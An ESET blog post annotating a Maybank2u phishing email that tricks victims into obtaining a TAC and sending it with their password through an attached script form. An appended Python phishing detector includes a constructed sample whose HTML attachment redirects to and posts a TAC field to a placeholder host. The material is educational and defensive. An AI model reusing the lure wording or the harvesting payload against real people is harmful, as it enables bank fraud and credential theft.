
Phishing example from ESET

02 Mar 09

The scam is somewhat more elaborate than many we see, and it’s worth a little analysis to see what flags we can extract from it for spotting a phisher at work:

From: Maybank Online Account []
[That looks like a genuine address, but it's spoofed: you'd need access to the mail headers to confirm that, though.]

Sent: Friday, 27 February, 2009 1:45 PM
Subject: Dear Account Holder,
[They have your money, but they don't know your name? Lack of personalisation is a pretty reliable indicator of spammed, fraudulent mail.]

Dear maybank2u Account Holder,
[See above: but even if it used your email address, that wouldn't be much better. It's pretty easy to script a spam mailout to insert each recipient's email address. It's even feasible to parse the address to extract what may be the name of the account holder: however, that can result in curious effects like "Dear jero664..."]

Maybank2u would like to inform you that an increased number of merchants and ATMs in your country have experienced data compromises of payment cards used in their stores and at their ATMs, and that your funds may be at risk. To protect yourself, please follow the next steps :
[This is the threat: it's intended to panic you into taking an unconsidered, incautious action like giving your details to a complete stranger. The next section, however, is where it gets interesting. Most phishes tell you to click on a link which will take you to a fake site. This one does something quite different.]

* Log in into maybank2u online account
[URL removed, but this is the real bank site]

* You must request for TAC online via maybank2u - your TAC will be sent via SMS to the mobile phone number you registered at the ATM. ( you can find the "request a TAC" button in the right menu of your account "Utilities" )
[As I don't have an account there, I haven't checked this personally, but apparently this involves accessing the genuine site and requesting a Transaction Authorization Code (TAC). This is only supposed to be sent to a mobile phone number which the owner has registered with the bank over the counter. So how does this benefit the scammer?]

* Logout from your maybank2u account and close the browser.
* When you have received the TAC (Transaction Authorization Code) on your mobile phone, open the secured form attached to email and submit the requested information ( Account user ID, password and TAC )

[And this is where it all becomes clear. The attached form is, in fact, a piece of JavaScript that points to a site in China that has nothing whatsoever to do with Maybank. It's just another link to a fake web site. The previous procedure performs three main functions:

  • It obscures the fact that this is just a link to an unvalidated site with no proven connection to the apparent sender.

  • It sets up the victim to acquire all the information the scammer needs to plunder his account.

  • It looks as if the procedure is a comprehensive, safe, genuine validation procedure (indeed, it apparently really is), so the victim is off-guard when the last stage of the con is executed: the fact that the procedure actually seems lengthy and a little bureaucratic reinforces the victim's false sense of security.]

* Please allow 48 hours for processing


[In other words, please give me 48 hours to wreak havoc with your finances.]

Thank you,

maybank2u Risk Management Department
[Have a nice day!]

I’m sure you can see ways in which this approach could be localized to map to where you live!

Thanks to Quah PK for bringing this to my attention.

Director of Malware Research
ESET Global
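
The flags called out in the annotations above (an impersonal greeting, a request for password and TAC, and an attached "form" that is really script pointing at a site unrelated to the apparent sender) can be checked mechanically. The following is an added example, not part of the original article and not ESET code; the sample message, its host names and the `phish_flags` helper are constructed for illustration.

```python
import email
import re
from email import policy
from urllib.parse import urlparse
# Constructed sample modelled on the message above; all hosts are placeholders.
SAMPLE = """\
From: Example Bank Online <alerts@bank.example>
Subject: Dear Account Holder,
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Dear Account Holder,
Open the secured form attached and submit your user ID, password and TAC.
--b1
Content-Type: text/html
Content-Disposition: attachment; filename="secured_form.html"

<script>window.location="http://collector.invalid/login";</script>
<form action="http://collector.invalid/post"><input name="tac"></form>
--b1--
"""

GENERIC = re.compile(r"^dear\s+(\S+\s+)?(account holder|customer|user)\b", re.I | re.M)
SECRETS = re.compile(r"\b(password|pin|tac)\b", re.I)
URL = re.compile(r"https?://[^\s\"'<>]+", re.I)

def phish_flags(raw):  # hypothetical helper: returns a set of warning flags
    msg = email.message_from_string(raw, policy=policy.default)
    claimed = msg["From"].addresses[0].domain.lower()  # spoofable; comparison only
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content() if body else ""
    flags = set()
    if GENERIC.search(str(msg["Subject"])) or GENERIC.search(text):
        flags.add("generic-greeting")
    if SECRETS.search(text):
        flags.add("asks-for-credentials")
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        html = part.get_content()
        if re.search(r"<(script|form)\b", html, re.I):
            flags.add("active-html-attachment")
        for url in URL.findall(html):  # where the "secured form" really sends data
            host = (urlparse(url).hostname or "").lower()
            if host != claimed and not host.endswith("." + claimed):
                flags.add("off-domain-target:" + host)
    return flags
```

The `From` domain is used only as the claimed identity to compare against; as the article notes, confirming the spoof itself requires the full mail headers.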

To find out more about ESET, visit the ESET website.
